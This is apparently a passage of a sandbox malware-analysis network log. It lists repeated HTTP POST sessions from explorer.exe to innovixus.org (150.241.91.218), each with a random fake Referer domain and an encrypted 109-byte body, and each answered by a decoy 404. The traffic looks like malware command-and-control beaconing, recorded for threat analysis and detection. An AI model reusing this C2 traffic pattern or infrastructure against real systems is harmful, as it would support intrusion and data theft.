                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:17.575771093 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:17.833642006 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:17 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              121192.168.11.2049875150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:18.033814907 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://mnukhwhwcaixirlf.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:18.033816099 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:18.589004040 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:18 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              122192.168.11.2049876150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:18.796365976 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://vvmbajkucaatutc.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:18.796365976 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:19.053623915 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:18 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              123192.168.11.2049877150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:19.257838964 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://smcrbkmssru.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:19.257838964 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:19.515274048 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:19 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              124192.168.11.2049878150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:19.719686985 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://rbdbinkmyua.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:19.719686985 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:19.979708910 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:19 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              125192.168.11.2049879150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:20.180217028 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://qworyewaiytyak.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:20.180217028 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:20.435647964 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:20 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              126192.168.11.2049880150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:20.636214972 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://wfydwobacelvpgj.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:20.636214972 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:20.892093897 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:20 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              127192.168.11.2049881150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:21.096309900 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://thbdukiklwmgy.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:21.096309900 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:21.350871086 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              128192.168.11.2049882150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:21.554785967 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://qslwjksxubmxopsc.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:21.554785967 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:21.811357021 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              129192.168.11.2049883150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:22.024261951 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://qsatbmvflxpt.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:22.024261951 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:22.281352997 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:22 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              130192.168.11.2049884150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:22.489334106 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://rbufsxinhalh.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:22.489334106 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:22.746578932 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:22 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              131192.168.11.2049885150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:22.956223011 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://cdjangocrocctiqd.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:22.956223011 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:23.517568111 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:23 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              132192.168.11.2049886150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:23.717044115 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://iynlomxxfgvxelrm.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:23.717044115 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:23.974680901 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:23 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              133192.168.11.2049887150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:24.180833101 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://mclavjwptxlgrkj.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:24.180882931 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:24.443310976 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:24 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              134192.168.11.2049888150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:24.645596027 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://xwhcqnuigpcutgf.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:24.645596027 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:24.900651932 CET235INHTTP/1.1 404 Not Found
